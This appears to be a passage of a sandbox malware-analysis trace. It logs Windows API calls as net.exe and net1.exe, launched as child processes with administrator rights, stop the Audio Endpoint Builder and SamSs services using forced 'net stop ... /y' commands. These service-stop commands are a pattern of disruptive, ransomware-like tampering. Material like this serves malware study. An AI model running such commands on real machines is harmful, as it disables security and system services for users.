_wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0200.346] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0200.347] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0200.347] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0200.347] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0200.347] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0200.347] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0200.347] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0200.347] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0200.347] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0200.347] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0200.347] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0200.347] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0200.347] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0200.347] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0200.347] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0200.347] wcsncpy_s (in: _Destination=0x3125266, _SizeInWords=0x15, _Source="AUDIOENDPOINTBUILDER", _MaxCount=0x14 | out: _Destination="AUDIOENDPOINTBUILDER") returned 0x0 [0200.347] wcsncpy_s (in: _Destination=0x312523c, _SizeInWords=0x15, _Source="AUDIOENDPOINTBUILDER", _MaxCount=0x14 | out: _Destination="AUDIOENDPOINTBUILDER") returned 0x0 [0200.347] NetApiBufferFree (Buffer=0x3123440) returned 0x0 [0200.347] GetServiceDisplayNameW (in: hSCManager=0x31208a0, lpServiceName="AUDIOENDPOINTBUILDER", lpDisplayName=0x2c7820, lpcchBuffer=0x30bf8b8 | out: lpDisplayName="Windows Audio Endpoint Builder", lpcchBuffer=0x30bf8b8) returned 1 [0200.347] FormatMessageW (in: dwFlags=0x2800, lpSource=0x3370002, dwMessageId=0xdc7, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="The Windows Audio Endpoint Builder service is stopping") returned 0x36 [0200.348] GetFileType (hFile=0x90) returned 0x2 [0200.348] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf87c | out: lpMode=0x30bf87c) returned 1 [0201.270] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x30bf888, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x30bf888*=0x36) returned 1 [0201.859] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format=".", _ArgList=0x30bf888 | out: _Buffer=".") returned 1 [0201.859] GetFileType (hFile=0x90) returned 0x2 [0201.859] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf874 | out: lpMode=0x30bf874) returned 1 [0202.592] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x30bf878, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x30bf878*=0x1) returned 1 [0203.347] Sleep (dwMilliseconds=0x9c4) [0206.399] NetApiBufferFree (Buffer=0x31250b0) returned 0x0 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="WORKSTATION") returned -22 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanWorkstation") returned -11 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SERVER") returned -18 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanServer") returned -11 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0206.399] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0206.400] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0206.400] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0206.400] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0206.400] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0206.400] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0206.400] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0206.400] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0206.400] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0206.400] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0206.400] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3120698 [0206.400] OpenServiceW (hSCManager=0x3120698, lpServiceName="AUDIOENDPOINTBUILDER", dwDesiredAccess=0x84) returned 0x3120990 [0206.400] ControlService (in: hService=0x3120990, dwControl=0x4, lpServiceStatus=0x30bf858 | out: lpServiceStatus=0x30bf858*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0206.401] GetLastError () returned 0x426 [0206.401] QueryServiceStatus (in: hService=0x3120990, lpServiceStatus=0x30bf858 | out: lpServiceStatus=0x30bf858*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0206.401] LocalAlloc (uFlags=0x40, uBytes=0x46) returned 0x3119e78 [0206.401] wcscpy_s (in: _Destination=0x3119e94, _SizeInWords=0x15, _Source="AUDIOENDPOINTBUILDER" | out: _Destination="AUDIOENDPOINTBUILDER") returned 0x0 [0206.401] CloseServiceHandle (hSCObject=0x3120698) returned 1 [0206.401] CloseServiceHandle (hSCObject=0x3120990) returned 1 [0206.401] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x30bf870 | out: Buffer=0x30bf870*=0x31250b0) returned 0x0 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="WORKSTATION") returned -22 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanWorkstation") returned -11 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SERVER") returned -18 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanServer") returned -11 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0206.402] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0206.402] wcsncpy_s (in: _Destination=0x3125266, _SizeInWords=0x15, _Source="AUDIOENDPOINTBUILDER", _MaxCount=0x14 | out: _Destination="AUDIOENDPOINTBUILDER") returned 0x0 [0206.402] wcsncpy_s (in: _Destination=0x312523c, _SizeInWords=0x15, _Source="AUDIOENDPOINTBUILDER", _MaxCount=0x14 | out: _Destination="AUDIOENDPOINTBUILDER") returned 0x0 [0206.402] NetApiBufferFree (Buffer=0x3119e78) returned 0x0 [0206.402] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format="\r\n", _ArgList=0x30bf888 | out: _Buffer="\r\n") returned 2 [0206.403] GetFileType (hFile=0x90) returned 0x2 [0206.403] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf874 | out: lpMode=0x30bf874) returned 1 [0207.108] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30bf878, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x30bf878*=0x2) returned 1 [0207.457] NetApiBufferFree (Buffer=0x31250b0) returned 0x0 [0207.457] GetServiceDisplayNameW (in: hSCManager=0x31208a0, lpServiceName="AUDIOENDPOINTBUILDER", lpDisplayName=0x2c7820, lpcchBuffer=0x30bf8b8 | out: lpDisplayName="Windows Audio Endpoint Builder", lpcchBuffer=0x30bf8b8) returned 1 [0207.457] FormatMessageW (in: dwFlags=0x2800, lpSource=0x3370002, dwMessageId=0xdc9, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="The Windows Audio Endpoint Builder service was stopped successfully.\r\n") returned 0x46 [0207.457] GetFileType (hFile=0x90) returned 0x2 [0207.457] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf8bc | out: lpMode=0x30bf8bc) returned 1 [0207.755] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0x46, lpNumberOfCharsWritten=0x30bf8c4, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x30bf8c4*=0x46) returned 1 [0208.004] GetFileType (hFile=0x90) returned 0x2 [0208.004] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf8bc | out: lpMode=0x30bf8bc) returned 1 [0208.150] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2a12e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30bf8c4, lpReserved=0x0 | out: lpBuffer=0x2a12e4*, lpNumberOfCharsWritten=0x30bf8c4*=0x2) returned 1 [0208.410] NetApiBufferFree (Buffer=0x3117cd0) returned 0x0 [0208.410] NetApiBufferFree (Buffer=0x3117ce8) returned 0x0 [0208.410] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop \"audioendpointbuilder\" /y" [0208.410] exit (_Code=0) Thread: id = 353 os_tid = 0x14d8 Process: id = "23" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1228d000" os_pid = "0x1268" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"audioendpointbuilder\" /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 280 os_tid = 0x1254 Thread: id = 512 os_tid = 0x1760 Process: id = "24" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x2bb4b000" os_pid = "0xed8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0x1240" cmd_line = "C:\\WINDOWS\\system32\\net1 stop \"samss\" /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 282 os_tid = 0xfb4 [0142.523] GetModuleHandleA (lpModuleName=0x0) returned 0x2a0000 [0142.523] __set_app_type (_Type=0x1) [0142.523] __p__fmode () returned 0x76953c14 [0142.523] __p__commode () returned 0x769549ec [0142.523] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2a6f20) returned 0x0 [0142.523] __getmainargs (in: _Argc=0x2bf608, _Argv=0x2bf60c, _Env=0x2bf610, _DoWildCard=0, _StartInfo=0x2bf61c | out: _Argc=0x2bf608, _Argv=0x2bf60c, _Env=0x2bf610) returned 0 [0142.523] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0142.523] GetConsoleOutputCP () returned 0x1b5 [0143.204] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x2c6fa0 | out: lpCPInfo=0x2c6fa0) returned 1 [0143.204] SetThreadUILanguage (LangId=0x0) returned 0x2680409 [0144.037] sprintf_s (in: _DstBuf=0x287fb48, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0144.037] setlocale (category=0, locale=".437") returned="English_United States.437" [0144.039] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0144.039] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0144.039] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop \"samss\" /y" [0144.039] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x287f8f0, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0144.039] RtlAllocateHeap (HeapHandle=0x28f0000, Flags=0x0, Size=0x5e) returned 0x28f4230 [0144.039] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0144.039] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x287f8ec | out: Buffer=0x287f8ec*=0x28f83f8) returned 0x0 [0144.039] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x287f8e8 | out: Buffer=0x287f8e8*=0x28f84a0) returned 0x0 [0144.039] __iob_func () returned 0x76952608 [0144.039] _fileno (_File=0x76952608) returned 0 [0144.039] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0144.039] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0144.039] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0144.039] _wcsicmp (_String1="config", _String2="stop") returned -16 [0144.039] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0144.039] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0144.039] _wcsicmp (_String1="file", _String2="stop") returned -13 [0144.039] _wcsicmp (_String1="files", _String2="stop") returned -13 [0144.040] _wcsicmp (_String1="group", _String2="stop") returned -12 [0144.040] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0144.040] _wcsicmp (_String1="help", _String2="stop") returned -11 [0144.040] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0144.040] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0144.040] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0144.040] _wcsicmp (_String1="session", _String2="stop") returned -15 [0144.040] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0144.040] _wcsicmp (_String1=0x2a1ffc, _String2="stop") returned -15 [0144.040] _wcsicmp (_String1="share", _String2="stop") returned -12 [0144.040] _wcsicmp (_String1="start", _String2="stop") returned -14 [0144.040] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0144.040] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0144.040] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0144.040] _wcsicmp (_String1="accounts", _String2="samss") returned -18 [0144.040] _wcsicmp (_String1="computer", _String2="samss") returned -16 [0144.040] _wcsicmp (_String1="config", _String2="samss") returned -16 [0144.040] _wcsicmp (_String1="continue", _String2="samss") returned -16 [0144.040] _wcsicmp (_String1="cont", _String2="samss") returned -16 [0144.040] _wcsicmp (_String1="file", _String2="samss") returned -13 [0144.040] _wcsicmp (_String1="files", _String2="samss") returned -13 [0144.040] _wcsicmp (_String1="group", _String2="samss") returned -12 [0144.040] _wcsicmp (_String1="groups", _String2="samss") returned -12 [0144.040] _wcsicmp (_String1="help", _String2="samss") returned -11 [0144.040] _wcsicmp (_String1="helpmsg", _String2="samss") returned -11 [0144.040] _wcsicmp (_String1="localgroup", _String2="samss") returned -7 [0144.040] _wcsicmp (_String1="pause", _String2="samss") returned -3 [0144.040] _wcsicmp (_String1="session", _String2="samss") returned 4 [0144.040] _wcsicmp (_String1="sessions", _String2="samss") returned 4 [0144.040] _wcsicmp (_String1="sess", _String2="samss") returned 4 [0144.040] _wcsicmp (_String1="share", _String2="samss") returned 7 [0144.040] _wcsicmp (_String1="start", _String2="samss") returned 19 [0144.040] _wcsicmp (_String1="stats", _String2="samss") returned 19 [0144.040] _wcsicmp (_String1="statistics", _String2="samss") returned 19 [0144.040] _wcsicmp (_String1="stop", _String2="samss") returned 19 [0144.040] _wcsicmp (_String1="time", _String2="samss") returned 1 [0144.040] _wcsicmp (_String1="user", _String2="samss") returned 2 [0144.041] _wcsicmp (_String1="users", _String2="samss") returned 2 [0144.041] _wcsicmp (_String1="msg", _String2="samss") returned -6 [0144.041] _wcsicmp (_String1="messenger", _String2="samss") returned -6 [0144.041] _wcsicmp (_String1="receiver", _String2="samss") returned -1 [0144.041] _wcsicmp (_String1="rcv", _String2="samss") returned -1 [0144.041] _wcsicmp (_String1="netpopup", _String2="samss") returned -5 [0144.041] _wcsicmp (_String1="redirector", _String2="samss") returned -1 [0144.041] _wcsicmp (_String1="redir", _String2="samss") returned -1 [0144.041] _wcsicmp (_String1="rdr", _String2="samss") returned -1 [0144.041] _wcsicmp (_String1="workstation", _String2="samss") returned 4 [0144.041] _wcsicmp (_String1="work", _String2="samss") returned 4 [0144.041] _wcsicmp (_String1="wksta", _String2="samss") returned 4 [0144.041] _wcsicmp (_String1="prdr", _String2="samss") returned -3 [0144.041] _wcsicmp (_String1="devrdr", _String2="samss") returned -15 [0144.041] _wcsicmp (_String1="lanmanworkstation", _String2="samss") returned -7 [0144.041] _wcsicmp (_String1="server", _String2="samss") returned 4 [0144.041] _wcsicmp (_String1="svr", _String2="samss") returned 21 [0144.041] _wcsicmp (_String1="srv", _String2="samss") returned 17 [0144.041] _wcsicmp (_String1="lanmanserver", _String2="samss") returned -7 [0144.041] _wcsicmp (_String1="alerter", _String2="samss") returned -18 [0144.041] _wcsicmp (_String1="netlogon", _String2="samss") returned -5 [0144.041] _wcsupr (in: _String="samss" | out: _String="SAMSS") returned="SAMSS" [0144.041] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x29007a8 [0144.044] GetServiceKeyNameW (in: hSCManager=0x29007a8, lpDisplayName="SAMSS", lpServiceName=0x2c8c28, lpcchBuffer=0x287f85c | out: lpServiceName="", lpcchBuffer=0x287f85c) returned 0 [0144.045] _wcsicmp (_String1="msg", _String2="SAMSS") returned -6 [0144.045] _wcsicmp (_String1="messenger", _String2="SAMSS") returned -6 [0144.045] _wcsicmp (_String1="receiver", _String2="SAMSS") returned -1 [0144.045] _wcsicmp (_String1="rcv", _String2="SAMSS") returned -1 [0144.045] _wcsicmp (_String1="redirector", _String2="SAMSS") returned -1 [0144.045] _wcsicmp (_String1="redir", _String2="SAMSS") returned -1 [0144.045] _wcsicmp (_String1="rdr", _String2="SAMSS") returned -1 [0144.045] _wcsicmp (_String1="workstation", _String2="SAMSS") returned 4 [0144.045] _wcsicmp (_String1="work", _String2="SAMSS") returned 4 [0144.045] _wcsicmp (_String1="wksta", _String2="SAMSS") returned 4 [0144.045] _wcsicmp (_String1="prdr", _String2="SAMSS") returned -3 [0144.045] _wcsicmp (_String1="devrdr", _String2="SAMSS") returned -15 [0144.045] _wcsicmp (_String1="lanmanworkstation", _String2="SAMSS") returned -7 [0144.045] _wcsicmp (_String1="server", _String2="SAMSS") returned 4 [0144.045] _wcsicmp (_String1="svr", _String2="SAMSS") returned 21 [0144.045] _wcsicmp (_String1="srv", _String2="SAMSS") returned 17 [0144.045] _wcsicmp (_String1="lanmanserver", _String2="SAMSS") returned -7 [0144.045] _wcsicmp (_String1="alerter", _String2="SAMSS") returned -18 [0144.045] _wcsicmp (_String1="netlogon", _String2="SAMSS") returned -5 [0144.045] _wcsicmp (_String1="SAMSS", _String2="WORKSTATION") returned -4 [0144.045] _wcsicmp (_String1="SAMSS", _String2="LanmanWorkstation") returned 7 [0144.045] _wcsicmp (_String1="SAMSS", _String2="SERVER") returned -4 [0144.045] _wcsicmp (_String1="SAMSS", _String2="LanmanServer") returned 7 [0144.045] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0144.045] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0144.045] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0144.045] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0144.045] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0144.045] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0144.045] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0144.046] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0144.046] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0144.046] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0144.046] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0144.046] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0144.046] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0144.046] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0144.046] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0144.046] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0144.046] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0144.046] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0144.046] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0144.046] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0144.046] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0144.046] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0144.046] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0144.046] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0144.046] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0144.046] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0144.046] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0144.046] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0144.046] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0144.046] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0144.046] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x2900690 [0144.046] OpenServiceW (hSCManager=0x2900690, lpServiceName="SAMSS", dwDesiredAccess=0x84) returned 0x29005f0 [0144.047] ResolveDelayLoadedAPI () returned 0x73f29e60 [0144.047] ControlService (in: hService=0x29005f0, dwControl=0x4, lpServiceStatus=0x287f7d8 | out: lpServiceStatus=0x287f7d8*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0144.048] LocalAlloc (uFlags=0x40, uBytes=0x28) returned 0x28f2d98 [0144.048] wcscpy_s (in: _Destination=0x28f2db4, _SizeInWords=0x6, _Source="SAMSS" | out: _Destination="SAMSS") returned 0x0 [0144.048] CloseServiceHandle (hSCObject=0x2900690) returned 1 [0144.049] CloseServiceHandle (hSCObject=0x29005f0) returned 1 [0144.049] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x287f7bc | out: Buffer=0x287f7bc*=0x2900318) returned 0x0 [0144.049] _wcsicmp (_String1="SAMSS", 